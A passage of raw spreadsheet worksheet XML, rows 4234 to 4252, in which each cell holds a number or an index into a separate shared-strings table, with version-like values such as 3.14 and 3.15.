      <c r="Q4234" s="12">
        <v>3.14</v>
      </c>
      <c r="R4234" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4234" s="12" t="s">
        <v>27229</v>
      </c>
      <c r="T4234" s="12" t="s">
        <v>27230</v>
      </c>
      <c r="U4234" s="12" t="s">
        <v>27231</v>
      </c>
      <c r="V4234" s="12" t="s">
        <v>26443</v>
      </c>
      <c r="W4234" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4234" s="12">
        <v>16</v>
      </c>
      <c r="Y4234" s="12" t="s">
        <v>27232</v>
      </c>
    </row>
    <row r="4235" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4235" s="12">
        <v>75581</v>
      </c>
      <c r="B4235" s="12" t="s">
        <v>30362</v>
      </c>
      <c r="C4235" s="12" t="s">
        <v>30363</v>
      </c>
      <c r="D4235" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4235" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4235" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4235" s="12" t="s">
        <v>27233</v>
      </c>
      <c r="H4235" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4235" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4235" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4235" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4235" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4235" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4235" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4235" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4235" s="12" t="s">
        <v>27234</v>
      </c>
      <c r="Q4235" s="12">
        <v>3.14</v>
      </c>
      <c r="R4235" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4235" s="12" t="s">
        <v>27235</v>
      </c>
      <c r="T4235" s="12" t="s">
        <v>27236</v>
      </c>
      <c r="U4235" s="12" t="s">
        <v>27237</v>
      </c>
      <c r="V4235" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4235" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4235" s="12">
        <v>19</v>
      </c>
      <c r="Y4235" s="12" t="s">
        <v>27238</v>
      </c>
    </row>
    <row r="4236" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4236" s="12">
        <v>76221</v>
      </c>
      <c r="B4236" s="12" t="s">
        <v>29942</v>
      </c>
      <c r="D4236" s="12" t="s">
        <v>29930</v>
      </c>
      <c r="E4236" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4236" s="12" t="s">
        <v>29916</v>
      </c>
      <c r="G4236" s="12" t="s">
        <v>27239</v>
      </c>
      <c r="H4236" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4236" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4236" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4236" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4236" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4236" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4236" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4236" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4236" s="12" t="s">
        <v>27240</v>
      </c>
      <c r="Q4236" s="12">
        <v>3.15</v>
      </c>
      <c r="R4236" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4236" s="12" t="s">
        <v>27241</v>
      </c>
      <c r="T4236" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U4236" s="12" t="s">
        <v>27242</v>
      </c>
      <c r="V4236" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4236" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4236" s="12">
        <v>5</v>
      </c>
      <c r="Y4236" s="12" t="s">
        <v>27243</v>
      </c>
    </row>
    <row r="4237" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4237" s="12">
        <v>76491</v>
      </c>
      <c r="B4237" s="12" t="s">
        <v>30124</v>
      </c>
      <c r="C4237" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D4237" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4237" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4237" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4237" s="12" t="s">
        <v>27244</v>
      </c>
      <c r="H4237" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4237" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4237" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4237" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4237" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4237" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4237" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4237" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4237" s="12" t="s">
        <v>27245</v>
      </c>
      <c r="Q4237" s="12">
        <v>3.15</v>
      </c>
      <c r="R4237" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4237" s="12" t="s">
        <v>27246</v>
      </c>
      <c r="T4237" s="12" t="s">
        <v>27247</v>
      </c>
      <c r="U4237" s="12" t="s">
        <v>27248</v>
      </c>
      <c r="V4237" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4237" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4237" s="12">
        <v>69</v>
      </c>
      <c r="Y4237" s="12" t="s">
        <v>27249</v>
      </c>
    </row>
    <row r="4238" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4238" s="12">
        <v>76921</v>
      </c>
      <c r="B4238" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4238" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4238" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4238" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4238" s="12" t="s">
        <v>27250</v>
      </c>
      <c r="H4238" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4238" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4238" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K4238" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4238" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4238" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4238" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4238" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4238" s="12">
        <v>3.14</v>
      </c>
      <c r="Q4238" s="12">
        <v>3.14</v>
      </c>
      <c r="R4238" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4238" s="12" t="s">
        <v>27251</v>
      </c>
      <c r="T4238" s="12" t="s">
        <v>27252</v>
      </c>
      <c r="U4238" s="12" t="s">
        <v>27253</v>
      </c>
      <c r="V4238" s="12" t="s">
        <v>10166</v>
      </c>
      <c r="W4238" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4238" s="12">
        <v>5</v>
      </c>
      <c r="Y4238" s="12" t="s">
        <v>27254</v>
      </c>
    </row>
    <row r="4239" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4239" s="12">
        <v>77251</v>
      </c>
      <c r="B4239" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C4239" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D4239" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4239" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4239" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4239" s="12" t="s">
        <v>27261</v>
      </c>
      <c r="H4239" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4239" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4239" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4239" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4239" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4239" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4239" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4239" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4239" s="12" t="s">
        <v>27256</v>
      </c>
      <c r="Q4239" s="12">
        <v>3.15</v>
      </c>
      <c r="R4239" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4239" s="12" t="s">
        <v>27262</v>
      </c>
      <c r="T4239" s="12" t="s">
        <v>27263</v>
      </c>
      <c r="U4239" s="12" t="s">
        <v>27264</v>
      </c>
      <c r="V4239" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W4239" s="12">
        <v>81341</v>
      </c>
      <c r="X4239" s="12">
        <v>10</v>
      </c>
      <c r="Y4239" s="12" t="s">
        <v>27265</v>
      </c>
    </row>
    <row r="4240" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4240" s="13">
        <v>77431</v>
      </c>
      <c r="B4240" s="13" t="s">
        <v>28390</v>
      </c>
      <c r="C4240" s="13" t="s">
        <v>30771</v>
      </c>
      <c r="D4240" s="19" t="s">
        <v>28349</v>
      </c>
      <c r="E4240" s="19" t="s">
        <v>31426</v>
      </c>
      <c r="F4240" s="13" t="s">
        <v>30772</v>
      </c>
      <c r="G4240" s="13" t="s">
        <v>27266</v>
      </c>
      <c r="H4240" s="13" t="s">
        <v>21</v>
      </c>
      <c r="I4240" s="13" t="s">
        <v>51</v>
      </c>
      <c r="J4240" s="13" t="s">
        <v>9219</v>
      </c>
      <c r="K4240" s="13" t="s">
        <v>19481</v>
      </c>
      <c r="L4240" s="13" t="s">
        <v>11536</v>
      </c>
      <c r="M4240" s="13" t="s">
        <v>31582</v>
      </c>
      <c r="N4240" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4240" s="13" t="s">
        <v>31589</v>
      </c>
      <c r="P4240" s="13" t="s">
        <v>27267</v>
      </c>
      <c r="Q4240" s="13">
        <v>3.14</v>
      </c>
      <c r="R4240" s="13" t="s">
        <v>17</v>
      </c>
      <c r="S4240" s="13" t="s">
        <v>27268</v>
      </c>
      <c r="T4240" s="13" t="s">
        <v>27269</v>
      </c>
      <c r="U4240" s="13" t="s">
        <v>27270</v>
      </c>
      <c r="V4240" s="13" t="s">
        <v>25878</v>
      </c>
      <c r="W4240" s="13" t="s">
        <v>20</v>
      </c>
      <c r="X4240" s="13">
        <v>66</v>
      </c>
      <c r="Y4240" s="13" t="s">
        <v>27271</v>
      </c>
    </row>
    <row r="4241" spans="1:25" s="13" customFormat="1" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4241" s="12">
        <v>77771</v>
      </c>
      <c r="B4241" s="12" t="s">
        <v>30125</v>
      </c>
      <c r="C4241" s="12"/>
      <c r="D4241" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="E4241" s="12"/>
      <c r="F4241" s="12" t="s">
        <v>30126</v>
      </c>
      <c r="G4241" s="12" t="s">
        <v>27277</v>
      </c>
      <c r="H4241" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4241" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4241" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4241" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4241" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4241" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4241" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4241" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4241" s="12" t="s">
        <v>27278</v>
      </c>
      <c r="Q4241" s="12">
        <v>3.14</v>
      </c>
      <c r="R4241" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4241" s="12" t="s">
        <v>27279</v>
      </c>
      <c r="T4241" s="12" t="s">
        <v>16554</v>
      </c>
      <c r="U4241" s="12" t="s">
        <v>27280</v>
      </c>
      <c r="V4241" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W4241" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4241" s="12">
        <v>20</v>
      </c>
      <c r="Y4241" s="12" t="s">
        <v>27281</v>
      </c>
    </row>
    <row r="4242" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4242" s="12">
        <v>77951</v>
      </c>
      <c r="B4242" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4242" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4242" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4242" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4242" s="12" t="s">
        <v>27282</v>
      </c>
      <c r="H4242" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4242" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4242" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4242" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4242" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4242" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4242" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4242" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4242" s="12">
        <v>3.15</v>
      </c>
      <c r="Q4242" s="12">
        <v>3.15</v>
      </c>
      <c r="R4242" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4242" s="12" t="s">
        <v>27283</v>
      </c>
      <c r="T4242" s="12" t="s">
        <v>2175</v>
      </c>
      <c r="U4242" s="12" t="s">
        <v>27284</v>
      </c>
      <c r="V4242" s="12" t="s">
        <v>26469</v>
      </c>
      <c r="W4242" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4242" s="12">
        <v>18</v>
      </c>
      <c r="Y4242" s="12" t="s">
        <v>27285</v>
      </c>
    </row>
    <row r="4243" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4243" s="12">
        <v>78201</v>
      </c>
      <c r="B4243" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4243" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4243" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4243" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4243" s="12" t="s">
        <v>27286</v>
      </c>
      <c r="H4243" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4243" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4243" s="12" t="s">
        <v>25003</v>
      </c>
      <c r="K4243" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4243" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4243" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4243" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4243" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4243" s="12" t="s">
        <v>27287</v>
      </c>
      <c r="Q4243" s="12">
        <v>3.12</v>
      </c>
      <c r="R4243" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4243" s="12" t="s">
        <v>27288</v>
      </c>
      <c r="T4243" s="12" t="s">
        <v>27289</v>
      </c>
      <c r="U4243" s="12" t="s">
        <v>27290</v>
      </c>
      <c r="V4243" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4243" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4243" s="12">
        <v>240</v>
      </c>
      <c r="Y4243" s="12" t="s">
        <v>27291</v>
      </c>
    </row>
    <row r="4244" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4244" s="12">
        <v>80911</v>
      </c>
      <c r="B4244" s="12" t="s">
        <v>30423</v>
      </c>
      <c r="C4244" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4244" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4244" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4244" s="12" t="s">
        <v>30422</v>
      </c>
      <c r="G4244" s="12" t="s">
        <v>27298</v>
      </c>
      <c r="H4244" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4244" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4244" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K4244" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4244" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4244" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4244" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4244" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4244" s="12" t="s">
        <v>27299</v>
      </c>
      <c r="Q4244" s="12">
        <v>3.16</v>
      </c>
      <c r="R4244" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4244" s="12" t="s">
        <v>27300</v>
      </c>
      <c r="T4244" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="U4244" s="12" t="s">
        <v>27301</v>
      </c>
      <c r="V4244" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4244" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4244" s="12">
        <v>15</v>
      </c>
      <c r="Y4244" s="12" t="s">
        <v>27302</v>
      </c>
    </row>
    <row r="4245" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4245" s="12">
        <v>80941</v>
      </c>
      <c r="B4245" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4245" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4245" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4245" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4245" s="12" t="s">
        <v>27303</v>
      </c>
      <c r="H4245" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4245" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4245" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4245" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4245" s="12" t="s">
        <v>26139</v>
      </c>
      <c r="M4245" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4245" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4245" s="12" t="s">
        <v>31592</v>
      </c>
      <c r="P4245" s="12" t="s">
        <v>27293</v>
      </c>
      <c r="Q4245" s="12">
        <v>3.16</v>
      </c>
      <c r="R4245" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4245" s="12" t="s">
        <v>27304</v>
      </c>
      <c r="T4245" s="12" t="s">
        <v>9286</v>
      </c>
      <c r="U4245" s="12" t="s">
        <v>27305</v>
      </c>
      <c r="V4245" s="12" t="s">
        <v>27306</v>
      </c>
      <c r="W4245" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4245" s="12">
        <v>3</v>
      </c>
      <c r="Y4245" s="12" t="s">
        <v>27307</v>
      </c>
    </row>
    <row r="4246" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4246" s="12">
        <v>80981</v>
      </c>
      <c r="B4246" s="12" t="s">
        <v>31172</v>
      </c>
      <c r="C4246" s="12" t="s">
        <v>31173</v>
      </c>
      <c r="D4246" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4246" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4246" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4246" s="12" t="s">
        <v>27308</v>
      </c>
      <c r="H4246" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4246" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4246" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4246" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4246" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4246" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4246" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4246" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4246" s="12" t="s">
        <v>27309</v>
      </c>
      <c r="Q4246" s="12">
        <v>3.15</v>
      </c>
      <c r="R4246" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4246" s="12" t="s">
        <v>27310</v>
      </c>
      <c r="T4246" s="12" t="s">
        <v>20427</v>
      </c>
      <c r="U4246" s="12" t="s">
        <v>27297</v>
      </c>
      <c r="V4246" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W4246" s="12">
        <v>80991</v>
      </c>
      <c r="X4246" s="12">
        <v>18</v>
      </c>
      <c r="Y4246" s="12" t="s">
        <v>27311</v>
      </c>
    </row>
    <row r="4247" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4247" s="12">
        <v>81271</v>
      </c>
      <c r="B4247" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4247" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4247" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4247" s="12" t="s">
        <v>31367</v>
      </c>
      <c r="G4247" s="12" t="s">
        <v>27312</v>
      </c>
      <c r="H4247" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4247" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4247" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K4247" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4247" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4247" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4247" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4247" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4247" s="12" t="s">
        <v>27313</v>
      </c>
      <c r="Q4247" s="12">
        <v>3.14</v>
      </c>
      <c r="R4247" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4247" s="12" t="s">
        <v>27314</v>
      </c>
      <c r="T4247" s="12" t="s">
        <v>27315</v>
      </c>
      <c r="U4247" s="12" t="s">
        <v>27316</v>
      </c>
      <c r="V4247" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4247" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4247" s="12">
        <v>8</v>
      </c>
      <c r="Y4247" s="12" t="s">
        <v>27317</v>
      </c>
    </row>
    <row r="4248" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4248" s="12">
        <v>81461</v>
      </c>
      <c r="B4248" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4248" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4248" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4248" s="12" t="s">
        <v>27318</v>
      </c>
      <c r="H4248" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4248" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4248" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K4248" s="12" t="s">
        <v>27087</v>
      </c>
      <c r="L4248" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4248" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4248" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4248" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4248" s="12">
        <v>3.4</v>
      </c>
      <c r="Q4248" s="12">
        <v>3.4</v>
      </c>
      <c r="R4248" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4248" s="12" t="s">
        <v>27319</v>
      </c>
      <c r="T4248" s="12" t="s">
        <v>27320</v>
      </c>
      <c r="U4248" s="12" t="s">
        <v>27321</v>
      </c>
      <c r="V4248" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W4248" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4248" s="12">
        <v>3</v>
      </c>
      <c r="Y4248" s="12" t="s">
        <v>27322</v>
      </c>
    </row>
    <row r="4249" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4249" s="12">
        <v>81551</v>
      </c>
      <c r="B4249" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4249" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4249" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4249" s="12" t="s">
        <v>30575</v>
      </c>
      <c r="G4249" s="12" t="s">
        <v>27324</v>
      </c>
      <c r="H4249" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4249" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4249" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4249" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4249" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4249" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4249" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4249" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4249" s="12">
        <v>3.15</v>
      </c>
      <c r="Q4249" s="12">
        <v>3.15</v>
      </c>
      <c r="R4249" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4249" s="12" t="s">
        <v>27325</v>
      </c>
      <c r="T4249" s="12" t="s">
        <v>27326</v>
      </c>
      <c r="U4249" s="12" t="s">
        <v>27327</v>
      </c>
      <c r="V4249" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4249" s="12">
        <v>84861</v>
      </c>
      <c r="X4249" s="12">
        <v>112</v>
      </c>
      <c r="Y4249" s="12" t="s">
        <v>27328</v>
      </c>
    </row>
    <row r="4250" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4250" s="12">
        <v>81991</v>
      </c>
      <c r="B4250" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4250" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4250" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4250" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4250" s="12" t="s">
        <v>27329</v>
      </c>
      <c r="H4250" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4250" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4250" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4250" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4250" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4250" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4250" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4250" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4250" s="12" t="s">
        <v>27330</v>
      </c>
      <c r="Q4250" s="12">
        <v>3.15</v>
      </c>
      <c r="R4250" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4250" s="12" t="s">
        <v>27331</v>
      </c>
      <c r="T4250" s="12" t="s">
        <v>27332</v>
      </c>
      <c r="U4250" s="12" t="s">
        <v>27333</v>
      </c>
      <c r="V4250" s="12" t="s">
        <v>24344</v>
      </c>
      <c r="W4250" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4250" s="12">
        <v>2</v>
      </c>
      <c r="Y4250" s="12" t="s">
        <v>27334</v>
      </c>
    </row>
    <row r="4251" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4251" s="12">
        <v>82291</v>
      </c>
      <c r="B4251" s="13" t="s">
        <v>28390</v>
      </c>
      <c r="C4251" s="13" t="s">
        <v>28391</v>
      </c>
      <c r="D4251" s="13" t="s">
        <v>28349</v>
      </c>
      <c r="E4251" s="12" t="s">
        <v>31562</v>
      </c>
      <c r="F4251" s="13" t="s">
        <v>28347</v>
      </c>
      <c r="G4251" s="12" t="s">
        <v>27340</v>
      </c>
      <c r="H4251" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4251" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4251" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4251" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4251" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4251" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4251" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4251" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4251" s="12">
        <v>4.2</v>
      </c>
      <c r="Q4251" s="12">
        <v>4.2</v>
      </c>
      <c r="R4251" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4251" s="12" t="s">
        <v>27341</v>
      </c>
      <c r="T4251" s="12" t="s">
        <v>27342</v>
      </c>
      <c r="U4251" s="12" t="s">
        <v>27343</v>
      </c>
      <c r="V4251" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4251" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4251" s="12">
        <v>265</v>
      </c>
      <c r="Y4251" s="12" t="s">
        <v>27344</v>
      </c>
    </row>
    <row r="4252" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4252" s="12">
        <v>82611</v>
      </c>
      <c r="B4252" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D4252" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4252" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4252" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4252" s="12" t="s">
        <v>27345</v>
      </c>
      <c r="H4252" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4252" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4252" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4252" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4252" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4252" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4252" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4252" s="12" t="s">
